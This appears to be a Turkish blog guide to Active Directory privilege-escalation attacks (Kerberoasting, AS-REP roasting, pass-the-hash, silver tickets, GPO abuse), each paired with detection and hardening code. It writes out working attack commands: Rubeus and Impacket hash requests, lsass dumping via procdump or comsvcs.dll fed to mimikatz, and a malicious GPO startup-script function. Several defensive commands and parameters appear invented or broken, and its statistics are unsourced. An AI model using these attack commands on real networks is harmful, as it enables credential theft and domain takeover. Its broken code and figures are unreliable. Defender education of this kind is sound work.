Active Directory Ayrıcalık Yükseltme Saldırıları

Windows Active Directory'de Ayrıcalık Yükseltme Saldırıları: 5 Kritik Teknik ve Korunma Yöntemleri Giriş Windows Active Directory (AD)...

📊 Giriş: AD Güvenlik Durumu

Active Directory, kurumsal ağların %90'ından fazlasında kullanılıyor. Microsoft'un verilerine göre:

AD saldırıları 2023'te %67 arttı
Ortalama tespit süresi 287 gün
%85'i iç tehdit kaynaklı

🔍 1. Kerberoasting: Derinlemesine Analiz

Teknik Detaylar

# PowerShell ile SPN sorgulama
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName, PasswordLastSet | 
Select-Object SamAccountName, ServicePrincipalName, PasswordLastSet

# Kerberoasting tespiti için advanced query
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | 
Where-Object {$_.Message -like "*0x17*"} | 
Select-Object TimeCreated, @{Name="Client";Expression={$_.Properties[0].Value}}

Gelişmiş Saldırı Senaryoları

# Impacket ile advanced Kerberoasting
python GetUserSPNs.py -request -dc-ip 192.168.1.1 DOMAIN/user

# Rubeus ile stealth mode
Rubeus.exe kerberoast /outfile:hashes.txt /domain:domain.local /dc:DC01.domain.local /nowrap

Kapsamlı Korunma Yöntemleri

# Group Policy ile gMSA yapılandırması
# 1. Hizmet hesabı parola politikası
Set-ADDefaultDomainPasswordPolicy -Identity domain.local -MinPasswordLength 25 -ComplexityEnabled $true

# 2. Günlük denetim politikası
auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable

# 3. Real-time monitoring script
while ($true) {
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} -MaxEvents 10 | 
    Where-Object {$_.Properties[3].Value -eq "0x17"} |
    ForEach-Object {
        Write-Warning "Kerberoasting attempt detected: $($_.Properties[0].Value)"
    }
    Start-Sleep -Seconds 30
}

🎯 2. AS-REP Roasting: Gelişmiş Savunma

Detaylı Tespit Yöntemleri

# Pre-auth devre dışı hesapları bulma
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth, MemberOf |
Select-Object SamAccountName, Name, MemberOf, Enabled

# Advanced logging configuration
# Event ID 4768: Kerberos TGT requested without pre-auth

Saldırı Senaryosu Geliştirme

# Python ile AS-REP Roasting
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST
from impacket.krb5.kerberosv5 import sendReceive
from impacket.krb5 import constants

def asreproast_attack(username, domain, dc_ip):
    # Pre-auth olmadan AS-REQ oluşturma
    as_req = create_as_req(username, domain)
    response = sendReceive(as_req, domain, dc_ip)
    return extract_encrypted_part(response)

Gelişmiş Korunma Stratejileri

# Tüm hesaplarda pre-auth zorunluluğu
Get-ADUser -Filter * | ForEach-Object {
    Set-ADAccountControl -Identity $_.SamAccountName -DoesNotRequirePreAuth $false
}

# Privileged Access Workstations (PAW) yapılandırması
# 1. Admin hesapları için PAW zorunluluğu
# 2. JIT (Just-In-Time) admin erişimi
# 3. Privileged Identity Management

🔑 3. Pass-the-Hash: Modern Savunmalar

Detaylı Saldırı Teknikleri

# Mimikatz alternatifleri
# 1. Procdump + offline analysis
procdump.exe -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

# 2. Comsvcs.dll method
rundll32.exe C:\windows\system32\comsvcs.dll MiniDump (Get-Process lsass).id lsass.dmp full

Gelişmiş Tespit Mekanizmaları

# Real-time PtH tespiti
Register-WmiEvent -Query "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_LogonSession'" -Action {
    $logonType = $Event.SourceEventArgs.NewEvent.TargetInstance.LogonType
    if ($logonType -eq 3 -or $logonType -eq 9) {
        Write-EventLog -LogName "Security" -Source "PtH Detector" -EventId 4658 -Message "Potential PtH detected"
    }
}

# Network monitoring for NTLM
Get-NetEventPacketCapture -CaptureMode SaveToFile -FileName "NTLM_Traffic.pcap"

Kapsamlı Korunma Çözümleri

# LSA Protection Configuration
Registry Path: HKLM\SYSTEM\CurrentControlSet\Control\LSA
Value: RunAsPPL
Type: DWORD
Data: 1

# Credential Guard Group Policy
Computer Configuration > Administrative Templates > System > Device Guard
Enable: "Turn On Virtualization Based Security"

🎫 4. Pass-the-Ticket: Enterprise Savunma

Detaylı Saldırı Vektörleri

# Silver Ticket saldırısı
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP

def create_silver_ticket(domain, sid, target_spn):
    # Service ticket forgery
    ticket = forge_ticket(domain, sid, target_spn)
    return inject_ticket(ticket)

Gelişmiş Tespit Yöntemleri

# Kerberos ticket anomaly detection
# 1. Ticket lifetime monitoring
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | 
Select-Object TimeCreated, @{Name="TicketLifetime";Expression={$_.Properties[7].Value}}

# 2. Abnormal ticket requests
# Event ID 4768: TGT request from unusual location

Enterprise Korunma Stratejileri

# Protected Users Group implementation
# 1. Admin hesaplarını Protected Users grubuna ekle
Add-ADGroupMember -Identity "Protected Users" -Members "Domain Admins"

# 2. Ticket policies
Set-ADDefaultDomainPasswordPolicy -Identity domain.local -MaxTicketAge 4

🏛️ 5. GPO Abuse: Enterprise Yönetimi

Detaylı Saldırı Senaryoları

# GPO exploitation framework
function Add-MaliciousGPOScript {
    param($GPOName, $ScriptContent)
    
    $gpo = Get-GPO -Name $GPOName
    $registryPath = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts"
    
    # Startup script ekleme
    Set-GPRegistryValue -Name $GPOName -Key $registryPath -ValueName "Startup" -Type String -Value $ScriptContent
}

Gelişmiş Tespit Sistemleri

# GPO change monitoring
$query = @"
SELECT * FROM __InstanceModificationEvent WITHIN 10 
WHERE TargetInstance ISA 'Win32_GroupPolicy' 
AND TargetInstance.DisplayName = 'Default Domain Policy'
"@

Register-WmiEvent -Query $query -Action {
    Write-EventLog -LogName "Security" -Source "GPO Monitor" -EventId 5136 -Message "GPO modification detected"
}

Enterprise GPO Güvenliği

# GPO permission auditing
Get-GPO -All | ForEach-Object {
    $permissions = Get-GPPermission -Guid $_.Id -All
    $permissions | Where-Object {$_.Permission -eq "GpoEdit"} |
    Select-Object Trustee, Permission
}

# GPO backup automation
$backupPath = "\\server\gpo_backup\"
Get-GPO -All | Backup-GPO -Path $backupPath -Comment "Daily GPO Backup"

🛡️ Proaktif Savunma Stratejileri

1. Advanced Threat Hunting

# AD anomaly detection framework
function Start-ADThreatHunt {
    # 1. Kerberoasting avcılığı
    Hunt-Kerberoasting
    
    # 2. AS-REP Roasting avcılığı
    Hunt-ASREPRoasting
    
    # 3. PtH/PtT avcılığı
    Hunt-PassTheCredential
    
    # 4. GPO manipulation
    Hunt-GPOAbuse
}

2. Zero Trust Architecture

# Zero Trust prensipleri:
- Verify explicitly: Tüm erişimleri doğrula
- Use least privilege: Minimum yetki prensibi
- Assume breach: İhlal olduğunu varsay

3. Microsoft Security Stack

# Microsoft 365 Defender entegrasyonu
Connect-MsolService
Enable-MsolDevice -DeviceId (Get-MsolDevice -All).DeviceId

# Azure AD Identity Protection
Set-AzureADPolicy -Definition @'
{
    "displayName": "Block Legacy Auth",
    "state": "enabled"
}
'@

📈 Monitoring ve Reporting

SIEM Entegrasyonu

# Custom Windows Event koleksiyonu
wevtutil.exe sl Security /ms:1073741824
wevtutil.exe sl "Microsoft-Windows-Windows Defender/Operational" /ms:1073741824

# Splunk forwarder konfigürasyonu
& "$SplunkHome\bin\splunk.exe" add monitor "C:\Windows\System32\winevt\Logs\Security.evtx"

Özel Raporlama

# Daily security report
function Get-ADSecurityReport {
    $report = @{
        KerberoastingAttempts = (Get-KerberoastingEvents).Count
        ASREPRoastingAttempts = (Get-ASREPRoastingEvents).Count
        PtHEvents = (Get-PtHEvents).Count
        GPOChanges = (Get-GPOChanges).Count
    }
    return $report
}

🚨 Acil Müdahale Planı

1. Tespit Edilen Saldırı Senaryoları

# Automated incident response
function Invoke-ADIncidentResponse {
    param($AttackType, $CompromisedAccount)
    
    switch ($AttackType) {
        "Kerberoasting" {
            Reset-ADAccountPassword -Identity $CompromisedAccount
            Revoke-KerberosTickets -Identity $CompromisedAccount
        }
        "ASREPRoasting" {
            Enable-ADAccountPreAuth -Identity $CompromisedAccount
            Reset-ADAccountPassword -Identity $CompromisedAccount
        }
        "PtH" {
            Revoke-Sessions -Identity $CompromisedAccount
            Reset-ADAccountPassword -Identity $CompromisedAccount
        }
    }
}

2. Forensics ve Analysis

# Memory forensics için Volatility
volatility -f memory.dmp --profile=Win10x64_18362 pslist
volatility -f memory.dmp --profile=Win10x64_18362 mimikatz

# Disk forensics
ftkimager --source C: --dest C:\forensics\image.aff4

📚 Eğitim ve Farkındalık

Red Team Egzersizleri

# AD security assessment plan:
- Week 1: Kerberoasting simulation
- Week 2: AS-REP Roasting simulation  
- Week 3: PtH/PtT simulation
- Week 4: GPO abuse simulation
- Week 5: Full attack chain

Blue Team Eğitimi

# Defensive techniques workshop:
# 1. Advanced logging configuration
# 2. Real-time monitoring
# 3. Incident response procedures
# 4. Forensic analysis techniques

💡 Sonuç ve Öneriler

Öncelikli Eylemler:

✅ [ACİL] Tüm admin hesaplarında MFA zorunluluğu
✅ [ACİL] LSA Protection ve Credential Guard etkinleştirme
✅ [HAFTALIK] Kerberoasting ve AS-REP Roasting denetimi
✅ [AYLIK] GPO izinleri ve yapılandırması denetimi
✅ [SÜREKLİ] Security monitoring ve threat hunting

Uzun Vadeli Stratejiler:

🔒 Zero Trust Architecture implementasyonu
🔒 Privileged Access Management (PAM) çözümleri
🔒 Microsoft Defender for Identity entegrasyonu
🔒 Regular red team/purple team egzersizleri

Bu kapsamlı rehber, Active Directory güvenliğinizi bir sonraki seviyeye taşımanız için gerekli tüm araçları, teknikleri ve stratejileri içermektedir. Unutmayın: "Saldırganlar sadece bir açık bulmak zorunda, siz ise tüm açıkları kapatmak." 🔐

Menu

Bizi Takip Edin